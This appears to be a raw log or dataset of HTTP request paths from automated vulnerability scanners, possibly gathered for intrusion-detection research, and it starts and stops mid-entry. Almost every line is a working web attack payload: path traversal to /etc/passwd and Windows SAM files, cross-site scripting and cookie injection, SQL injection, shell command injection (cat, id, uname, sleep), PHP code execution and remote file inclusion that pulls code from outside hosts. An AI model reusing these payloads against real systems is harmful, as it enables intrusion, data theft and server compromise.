content=\"testviqu=1270\">\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php%3flogout%3d1&frm_user=&scr_height=q58671721&scr_width=\n/scripts/error.php?err=404\n/scripts/ideabox/include.php?ideadir=http://xxxxxxxx\n/scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,2094158887,1430162522,1,1,1,1,1--&blogid=1\n/scripts/auktion.cgi?menue=../../../../../../../../../etc/passwd\n/cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd\\x00board=board_1\n/t7tm4m0b.php3?<script>cross_site_scripting.nasl</script>\n/cacti/phptonuke.php?filnavn=/etc/passwd\n/33y9gcqq.cgi?<script>document.cookie=\"testnvxc=4301;\"</script>\n/<script>document.cookie=\"testxeoi=3573;\"</script>\n/de3v2dd9.asp?<script>cross_site_scripting.nasl</script>\n/scripts/r57.php\n/scripts/lce0cbkfb8xx.pl\n/0z575z74.jsp?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/ows-bin/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/javascript/custom-log.exe\n/examples/jsp/jsp2/el/admin/configset.php?settings_dir=/etc/passwd\\x00\n/cacti/main.php?g2_itemid=../../../../../license\\x00\n/s7qus4g3.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"&del q45435148 #\n/examples/jsp/error/demos/demo.browse.php?filename=/etc/passwd\n/javascript/ig.exe\n/javascript/ode.exe\n/rocco's initiations 9/\n/javascript/dm-config.exe\n/examples/jsp/cal/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\\x00\n/j2kdmfw4.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/i7prbs22.html?<script>document.cookie=\"testjnre=7328;\"</script>\n/h5i6crm3.exe?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/_vti_bin/shtml.exe/_vti_rpc\n/phpmyadmin/index.cfm?fuseaction=category.display&category_id='\n/cacti/index.php?selskin=../inc/boxleft.inc\\x00&xposbox[l][]=/etc/passwd\\x00\n/main.php?stuff='uname #\n/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\\x00\n/phpmyadmin/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1\n/mpcgi/ion-p.exe?page=c:\\winnt\\repair\\sam\n/t3af3tdz.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=;uname\\x09>q16213317\\x09#\n/javascript/owa.exe\n/javascript/browse.exe\n/main.php?stuff=\"ver\\x09>q32749899&rem\\x09\n/javascript/obsoleted.exe\n/cacti/supporter/tupdate.php?groupid=change&sg='\n/examples/jsp/colors/index.php?site=../../../../../../../../etc/passwd\\x00\n/en-us/account/dsweb/services/user-1\"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>\n/hipkz026.jspa?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/vjbrrppi.aspx?<script>cross_site_scripting.nasl</script>\n/en-us/w4996nr0.aspx?<script>document.cookie=\"testttvs=7163;\"</script>\n/cgibin/ion-p?page=../../../../../etc/passwd\n/help.php?q=\"&ver\\x09>q37118447&rem\\x09\n/jujgxwav.exe?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/help.php?q=\"&uname\\x09#\n/scripts/kfzqb5x87lvq.html\n/examples/jsp/checkbox/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\\x00\n/edzaia0i.jsp?<script>cross_site_scripting.nasl</script>\n/?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/cgi-bin/pollit/poll_it_ssi_v2.0.cgi?data_dir=\\etc\\passwd\\x00\n/subscriptionpro/\n/main.inc.php?pathtoscript=http://cirt.net/rfiinc.txt?\n/tukodz3j.do?<script>cross_site_scripting.nasl</script>\n/scriptpath/index.php?page=http://192.168.202.118:8080/2aibfaczmac8?\n/main.php?logout='sleep\\x097\\x09#\n/scripts/pnrwmkim.exe\n/top.php?stuff='uname\\x09>q19246858\\x09#\n/examples/jsp/cal/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl\n/manager/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/javascript/webdata.exe\n/examples/jsp/sessions/file.php?path=/etc/passwd\\x00\n/p043snfr.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/fioricet-prescription/\n/3hlysl2x.nsf?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/en-us/fo564rei.php?<script>cross_site_scripting.nasl</script>\n/nmw0do67.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-win/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/x7pclv4s.php3?<script>document.cookie=\"testiulz=3709;\"</script>\n/examples/jsp/jsp2/el/index.php?site=../../../../../../../../etc/passwd\\x00\n/yef5f3d5.jsp?<script>document.cookie=\"testcrcv=6167;\"</script>\n/javascript/pkgs.exe\n/top.php?stuff='&uname\\x09>q46445966\\x09#\n/top.php?stuff=\"rm\\x0cq33687847&rem\\x0c\n/eg2u8pbv.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-home/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/javascript/~dan.exe\n/cgi-bin/gbook/gbook.cgi?_mailto=xx;ls\n/yef5f3d5.x?<script>document.cookie=\"testcrcv=6167;\"</script>\n/vbascripting/\n/uc3w3bdi.jspa?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/javascript/.passwd.tpl\n/en-us/account/ftp/ftp.pl?dir=../../../../../../etc\n/javascript/full.exe\n/phpmyadmin//../../../../../../../../etc/passwd\\x00\n/mpcgi/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/u8yiqilu.php3?<script>document.cookie=\"testswjp=6010;\"</script>\n/examples/jsp/checkbox/cgiip.exe/wservice=wsbroker1/webutil/ping.p\n/examples/jsp/num/ion-p.exe?page=../../../../../etc/passwd\n/examples/jsp/cal/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\\x00\n/h5sc3gxy.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/whmch8ftkt7kv?\n/examples/jsp/error/login.php?course=\"><script>alert(atutor_xss.nasl)</script>\n/scripts/ui/login?user=nessus-1331904930\n/scripts/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331908738','5'--\n/m4kkjf8l.do?<script>document.cookie=\"testyglc=8988;\"</script>\n/cacti/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/w4996nr0.php?<script>document.cookie=\"testttvs=7163;\"</script>\n/scripts/index.php?edit=nonexistant1922416618\n/static//../../../../../../../../windows/win.ini\n/ht8pn8uq.cfm?<script>cross_site_scripting.nasl</script>\n/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;\n/examples/jsp/jsp2/jspx/zml.cgi?file=../../../../../../../../../../../../etc/passwd\\x00\n/user/remindpassword?return=\"><script>alert(414645599128)</script><\"\n/script/init/createallimagecache.php?path_to_code=http://192.168.202.96:8080/4dckqcc0acprbz?\n/netutils/findata.stm?host=<script>alert(document.cookie)</script>\n/w4996nr0.pl?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919142&lang_crm=../../../../../../../../../../../..//boot.ini\\x00\n/dataservice.asmx/authuser?username='nessus1331908868&password=nasl&needcompress=0\n/vhzmaia2.cfm?<script>document.cookie=\"testkogj=3979;\"</script>\n/en-us/i686v90l.idc?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/bad girls 'pardon me'/\n/tukodz3j.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/texis.exe/junk\n/0z575z74.nsf?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/edzaia0i.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1363072756--\n/examples/jsp/sessions/includes/config.php?relative_script_path=http://xxxxxxx\n/ju0u7kfo.fts?<script>cross_site_scripting.nasl</script>\n/cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat /etc/passwd\n/t578vqea.asp?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/jobdescriptionandsalary/\n/term-readpasswd/\n/ewc3rz1l.x?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/javascript/backend.exe\n/admin/config.php?display=did&rnavsort=description&didfilter=directdid\n/examples/jsp/colors/popup.php?include_path=/etc/passwd\\x00\n/main.php?logout=';sleep 10 #\n/cacti/mail.php?id='/**/union/**/select/**/1,2,1331909423,4--&blog=1\n/?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/cacti/rss.php?blogid=1&profile=../../config/config.properties.php\\x00\n/javascript/notified.exe\n/examples/jsp/jsp2/el/phpnews/sendtofriend.php?mid='1'\n/en-us/account/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search\n/quagynka.mscgi?<script>cross_site_scripting.nasl</script>\n/phpwcms_template/inc_script/frontend_render/navigation/config_html_menu.php?html_menu_dirpath=http://192.168.202.118:8080/2aibfaczmac8?\n/examples/jsp/cal/faxsurvey?cat /etc/passwd\n/cgi-bin/pbcgi.cgi?name=joe\\xcamel&email=<script>alert('vulnerable');</script>\n/if69ddo1.aspx?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/cgis/c32web.exe/changeadminpassword\n/javascript/thumbs.db.exe\n/examples/jsp/cal/forum_2.php?msg=10&return=<script>foo</script>\n/examples/jsp/cal/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\\x00\n/scgi-bin/sensepost.exe?/c+dir\n/cgi-914/gw5/gwweb.exe?htmlver=aaa&get-context\n/cgi-exe/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n//document.writeln(unescape(\"%3cscript src=%27http://www.example.com/test?rnd=q47944965%27><\"+string.fromcharcode(0x2f)+\"script>\"))\n/javascript/.passwd.cgi\n/hjdzm96v.kspx?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/scripts/quickstore.cgi?page=../../../../../../../../../../etc/passwd\\x00html&cart_id=\n/7o5qp766.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/33y9gcqq.do?<script>document.cookie=\"testnvxc=4301;\"</script>\n/examples/jsp/numfaq.php?skin=../../admin/manager&tplpath=admin\n/recordings/webplus.exe?script=webplus_install_path.nasl\n/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.96:8080/no4ghqiguzhst?\n/hed_subscriptions/\n/xsqln7eb.asp?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/recordings/feedsplitter.php?format=../../../../../../../../../../etc/passwd\\x00&debug=1\n/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\\x00\n/bl8sefdm.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/sawmillcl.exe?ho+{complete_version}\n/169okeyj.html?<script>document.cookie=\"testxeoi=3573;\"</script>\n/examples/jsp/sessions/showproduct.php?product=1'\n/examples/jsp/sessions/quickstore.cgi?page=../../../../../../../../../../etc/passwd\\x00html&cart_id=\n/?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/jscript.php?my_ms[root]=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/examples/jsp/cal/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\\x00\n/examples/jsp/jsp2/el/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd\n/qczkquis.idc?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/t578vqea.cfm?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/cgi-perl/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/demo/ms-pe02/catalog.php?cid=0&sid='\"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.96:8080/4dckqcc0acprbz?&\n/help.php?q=\"\\x0ddel\\x09q99489698\\x09#\n/javascript/www.exe\n/templates/tmpl_dfl/scripts/index.php?dir[inc]=@rfiurl\n/zuihld5m.asp?<script>cross_site_scripting.nasl</script>\n/apavxugx.cgi?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/javascript/.htaccess/.htaccess.aspx-->\">'>'\"<sfi000013v868621>\n/scripts/www/delivery/ac.php?bannerid=-14+or+1=1\n/gy23xnjq.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff='&del\\x09q84519525\\x09#\n/6wb70v0b.idc?<script>cross_site_scripting.nasl</script>\n/dslpwt15.html?<script>document.cookie=\"testtkio=5454;\"</script>\n/j4oqyvga.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/apr.exe\n/x2gyorli.htm?<script>document.cookie=\"testwhac=3130;\"</script>\n/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/txenjrxf3?\\x00\n/script_path/cms/classes/openengine/filepool.php?oe_classpath=http://cirt.net/rfiinc.txt??\n/examples/jsp/jsp2/el/way-board/way-board.cgi?db=/etc/passwd\\x00\n/webplus.exe?script=webplus_install_path.nasl\n/miz4r5hz.do?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/apavxugx.idc?<script>document.cookie=\"testdnbh=5237;\"</script>\n/fnwhrxyd.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@\n/top.php?stuff=';sleep\\x098\\x09#\n/cgi.cgi/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/um7xpn15.dll?<script>document.cookie=\"testotoy=6142;\"</script>\n/main.php?stuff=\"rm\\x09q32749899&rem\\x09\n/top.php?stuff=ver\\xa0>q79682776&rem\\xa0\n/main.php?stuff=';uname\\x09>q26313493\\x09#\n/top.php?stuff='\\x0asleep\\x0911\\x09#\n/examples/jsp/colors/viewcvs.cgi/?cvsroot=<script>foo</script>\n/helpnoscript_cds2/\n/examples/jsp/checkbox/themes/program/themesettings.inc.php?themesdir=/etc/passwd\\x00\n/examples/servlets/servlet/admin.php?style=../../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/error/install.php?newlang=../../cpg_error.log\\x00\n/kcsubscription/\n/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331919216,539900350 -- \n/\"jason scott\" podcasts/\n/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://cirt.net/rfiinc.txt?\n/byrg33fw.x?<script>document.cookie=\"testexuu=5340;\"</script>\n/en-us/oie504mr.x?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/audio_transcripts/\n/o1zj4u9v.dll?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/h21y8w52.pl?<script>cross_site_scripting.nasl</script>\n/ghswfouu.jsp?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/<script>document.cookie=\"testfuqi=4189;\"</script>\n/examples/jsp/sessions/sgdynamo.exe?htname=<script>foo</script>\n/main.php?logout=\"&ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/examples/jsp/sessions/index.php?op=default&date=200607' union select 1,1927066382,1,1,1,1,1,1,1,1--&blogid=1\n/jujgxwav.exe?<script>document.cookie=\"testknim=9383;\"</script>\n/b4vng02k.fts?<script>document.cookie=\"testtrlh=3672;\"</script>\n/main.php?logout=1' and 1=1 and ''<>'tvd59u9i\n/606wkcop.jsp?<script>cross_site_scripting.nasl</script>\n/d765w06j.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/nuh3zirz.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"&del\\x0bq12933545&rem\\x0b\n/cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>\n/scripts/browsedisk.asp\n/a0imiuf1.php3?<script>document.cookie=\"testxqrn=4654;\"</script>\n<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/cacti?username=\"<script>foo</script\n/top.php?stuff=\"&sleep\\x098\\x09#\n/examples/jsp/jsp2/el/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini\n/t3af3tdz.x?<script>cross_site_scripting.nasl</script>\n/scripts/showuser.cgi\n/lsoix5h3.dll?<script>cross_site_scripting.nasl</script>\n/help.php?q=';sleep 11 #\n/0z575z74.php3?<script>document.cookie=\"testuhsv=9753;\"</script>\nftp://192.168.25.203/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/javascript/crypto.exe\n/phpmyadmin/simple/view_page?mv_arg=|cat /etc/passwd|\n/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1928587300--\n/cgi-home/gwweb.exe?help=bad-request\n/script/index.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/scripts/kfzqb5x87lvq.php\n/javascript/tb.exe\n/7dbjwpw6.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/quagynka.html?<script>cross_site_scripting.nasl</script>\n/index.php?name=your account&profile=anyone\"><script>alert('nessus was here');</script>\n/examples/jsp/checkbox/kernel/loadkernel.php?installpath=/etc/passwd\\x00\n/main.php?stuff=\"\\x0auname >q16731133 #\n/cgi-bin/?mod=read&id=../../../../../../../../../../../../../etc/passwd\\x00\n/scripts/shoutbox.php?conf=../\n/macroscript webrecorder_information/\n/phpmyadmin/cgiip.exe/wservice=wsbroker1/webutil/ping.p\n/handyman's handbook/\n/ewc3rz1l.nsf?<script>document.cookie=\"testkgqo=204;\"</script>\n/sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>\n/hjdzm96v.html?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/scripts/newsdata/data/user.idx\n/main.php?logout=&ping;-w;11000;-n;1;1.2.3.4&rem;\n/jnv890lt.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/n9xlumt5.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/esmozg5d.php3?<script>cross_site_scripting.nasl</script>\n/scripts/modules/projects/sql/install-0.9.7.php?p=2\n/help.php?q=\"&del;q11575615&rem;\n/scripts/weigh_keywords.php?etcdir=http://192.168.202.118:8080/zz5thkvtmlgl?\n/report.php?scriptpath=http://192.168.202.96:8080/4dckqcc0acprbz??\n/vmi8bb12.aspx?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/examples/jsp/jsp2/jspx/docs/index.php?lang=/../../../../../../../../../../etc/passwd\\x00\n<script>document.cookie=\"testtrlh=3672;\"</script>\n/main.php?logout=\"del\\x09q74671245\\x09#\n/eel's cptech site/\n/axufhcur.exe/\n/examples/jsp/jsp2/jspx/mmstdod.cgi?alternate_templates=| echo \"content-type: text/html\";echo \"\" ; id\\x00\n/webtools/bonsai/cvslog.cgi?file=<script>alert('vulnerable')</script>\n/fpnpp5zg.jsp?<script>document.cookie=\"testyias=101;\"</script>\n/javascript/consumer.exe\n/scripts/bveygnpo6hkw.cgi\n/index.php?p='nessus\n/judy's_book/\n/scripts/u7m5ok8eqpfy.sh\n/en-us/oie504mr.idc?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/tuwjta1w.jsp?<script>document.cookie=\"testpokn=7494;\"</script>\n/o6ebbirj.php3?<script>cross_site_scripting.nasl</script>\n/?user=jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--&file=index&pass=\n/javascript/~apache.exe\n/examples/jsp/sessions/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\\x00gwextranet_template_dir_traversal.nasl\n/javascript/exchange.exe\n/top.php?stuff=&ver >q94375741&rem \n/0u75ldxq.exe?<script>cross_site_scripting.nasl</script>\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331918976&lang_crm=../../vtigerservice.php\\x00\n/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 2125564349--\n/examples/jsp/num/forum_2.php?msg=10&return=<script>foo</script>\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"zj\\0003x\\0315\\0200xp1\\0322\\0262\\0377\\0266\\0377\\0001\\0320\" >> /tmp/urcppbumwm0;echo|awstats535559.txt\n/scripts/wx4z4gedhl0l.cgi\n/examples/jsp/colors/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;\n/servlet/org.apache.catalina.containerservlet/<script>alert('vulnerable')</script>\n/examples/jsp/cal/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/jackrabbit/search.jsp?q=%\"<script>alert(1331922005)</script>\n/javascript/resources.exe\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+64+6c+6c+20+47+65+74+50+72+6f+63+41+64+64+72+65+73+73+4c+6f+61+64+4c+69+62++>>ctdn\n/xlj7h65o.jspa?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/examples/jsp/jsp2/jspx/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1\n<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/javascript/automatic.exe\n/content/base/build/explorer/none.php?/etc/passwd\n/search.jsp?q=%\"<script>alert(1331922091)</script>\n/vhzmaia2.fts?<script>document.cookie=\"testkogj=3979;\"</script>\n/scripts/sssdpups.exe\n/javascript/john.exe\n/scripts/bb-hist.sh?histfile=../../../../../etc/passwd\n/<script>document.cookie=\"testswjp=6010;\"</script>\n/examples/jsp/error/a1stats/a1disp3.cgi?/../../../../../../etc/passwd\n/macosxsshhelper/\n/subscriptions.trace\n/scripts/admin.php?style=../../../../../../../../../../../../etc/passwd\\x00\n/jnt3f86c.php3?<script>document.cookie=\"testcmax=9270;\"</script>\n/cacti/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd\n/en-us/hipkz026.dll?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/top.php?stuff=';uname\\x09>q65186773\\x09#\n/main.php?stuff='uname >q95495989 #\n/if69ddo1.php?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/dslpwt15.cfm?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/manager/mlog.html?screen=/etc/passwd\n/vwmg565s.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/path/nw/article.php?id='\n/antiboard.php?thread_id='\n/examples/jsp/error/admin/admin.php?sid='\n/cgi-bin/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/flower travellin' band/\n/examples/jsp/cal/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>\n/help.php?q=&del;q65325882&rem;\n/n1afe1y6.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/wdb-description/\n/index.php?src=1&_common=1&time=1331919221&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/main.php?stuff=\"ping\\x0c-w\\x0c8000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/scripts/empower?db=whateverwhatever\n/jw64yq8u.pl?<script>document.cookie=\"testylfu=1313;\"</script>\n/examples/jsp/jsp2/jspx/simple/view_page?mv_arg=|cat /etc/passwd|\n/<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/javascript/sale.exe\n/vac1l5vm.jspa?<script>cross_site_scripting.nasl</script>\n/scripts/sendform.cgi\n/?<script>document.cookie=\"testquyx=2820;\"</script>\n/main.php?stuff=\"del\\x0cq45919726&rem\\x0c\n/javascript/replicate.exe\n/ovcgi/main/snmp.exe\n/main.php?stuff=\"&rm\\x09q89486418&rem\\x09\n/en-us/jnv890lt.cfm?<script>cross_site_scripting.nasl</script>\n/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1114106,2,907689688,4,5,6,7,8,9,0,1,2,3 --\n/top.php?stuff=\"&del q95298396 #\n/vhzmaia2.jspa?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/logo_description/\n/j2kdmfw4.html?<script>cross_site_scripting.nasl</script>\n/library/ajax/prescription_drugname_lookup.php\n/help.php?q=\"&del,q46141422&rem,\n/cgi-bin/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl\n/medicaltranscriptionjobopening/\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008595&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/0u75ldxq.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scgi-bin/testcgi.exe\n/help.php?q='\\x0drm q58812882 #\n/login.php?btag=<script>alert(\"410776083388\");</script>\n/cacti/bb-hist.sh?histfile=../../../../../etc/passwd\n/recordings/way-board/way-board.cgi?db=/etc/passwd\\x00\n/scripts/showcat.php?cat=1'\n/scripts/encoder.php\n/javascript/https.exe\n/main.php?stuff=\"&ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/n9xlumt5.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/-i've already sent a mail to the technical team at titus/\n/main.php?stuff=\";sleep 10 #\n/webdav/phprun.php?cmd=c:\\caseyobrien.exe\n/hosting_passwd/\n/top.php?stuff='uname >q76482731 #\n/cgi-bin/shop.pl/page=;cat shop.pl|\n/yef5f3d5.kspx?<script>document.cookie=\"testcrcv=6167;\"</script>\n/prescription-valium/\n/cgi-exe/ion-p.exe?page=c:\\winnt\\repair\\sam\n/j4rdyhw8.php?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/index.php?id=9_8hm4y9d6'\n/examples/jsp/jsp2/el/help/index.php?help_file=../../../../../../../../../../../etc/passwd\n//etc/passwd\n/static///../../../../../../../..etc/passwd\n/aj3pf49c.fts?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/javascript/.htpasswd.sfish/9-1\n/en-us/account/mmstdod.cgi?alternate_templates=| echo \"content-type: text/html\";echo \"\" ; id\\x00\n/fnwhrxyd.mscgi?<script>cross_site_scripting.nasl</script>\n/javascript/1995.exe\n/nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/javascript/down.exe\n/fitt's_law/\n/vbscript_examples/\n/javascript/templ.exe\n/javascript/prv.exe\n/top.php?stuff=\"ping\\x09-w\\x099000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/subscriptions.csproj\n/cgi-win/gw5/gwweb.exe?help=bad-request\n/fcgi-bin/ion-p.exe?page=c:\\winnt\\repair\\sam\n/scripts/w04ukbv54ixz.php\n/zuihld5m.php?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/viewcvs.cgi/?cvsroot=<script>foo</script>\n/b4vng02k.dll?<script>document.cookie=\"testtrlh=3672;\"</script>\n/quagynka.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/8t9v8k7x.php?<script>document.cookie=\"testhvje=9403;\"</script>\n/examples/jsp/error/index.php?id='union/**/select/**/0,0,173444095,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/scripts/mylog.html?screen=/etc/passwd\n/javascript/reporting.exe\n/scripts/styles.php?toroot=/etc/passwd\\x00\n/cgi/gw5/gwweb.exe?help=bad-request\n/top.php?stuff=;uname >q28242581 #\n/main.php?logout=\"\\x0drm\\x09q83433457\\x09#\n/scripts/b0j2ijssh6cu.php\n/recordings/search=<script>alert('xss')</script>\n/forum1.asp?n=1753&amp;nn=`/etc/passwd`\n/fmnveedu.dll?<script>document.cookie=\"testgfbr=7014;\"</script>\n/user.php?caselist[bad_file.txt][path]=http://192.168.202.118:8080/tzhfyzkbomspvm?&command=cat /etc/passwd\n/phpmyadmin//..\\..\\..\\..\\..\\..\\..\\..\\etc/passwd\n/slaktoolscripts/\n/9ko6m4c8.mscgi?<script>document.cookie=\"testylik=3403;\"</script>\n/script/menu/menuadministration.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?\n/cgi-bin/item.fts?href=\"><script>alert(\"ftgate_44002.nasl\")</script>;\n/examples/jsp/jsp2/jspx/listrec.pl?app=qmh-news&template=;ls /etc|\n/examples/jsp/jsp2/el/quickstore.cgi?page=../../../../../../../../../../etc/passwd\\x00html&cart_id=\n/phpmyadmin/styles.php?toroot=/etc/passwd\\x00\n/javascript/document.out\n/d7ktpmcq.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/9ko6m4c8.kspx?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd\n/forum-ra_professionnel.asp?n=/etc/passwd\n/ap58k3ci.asp?<script>cross_site_scripting.nasl</script>\n/admin/news.admin.php?path_to_script=http://192.168.202.96:8080/4dckqcc0acprbz??&cmd=ls\n/javascript/htpasswd.nsf\n<meta http-equiv=set-cookie 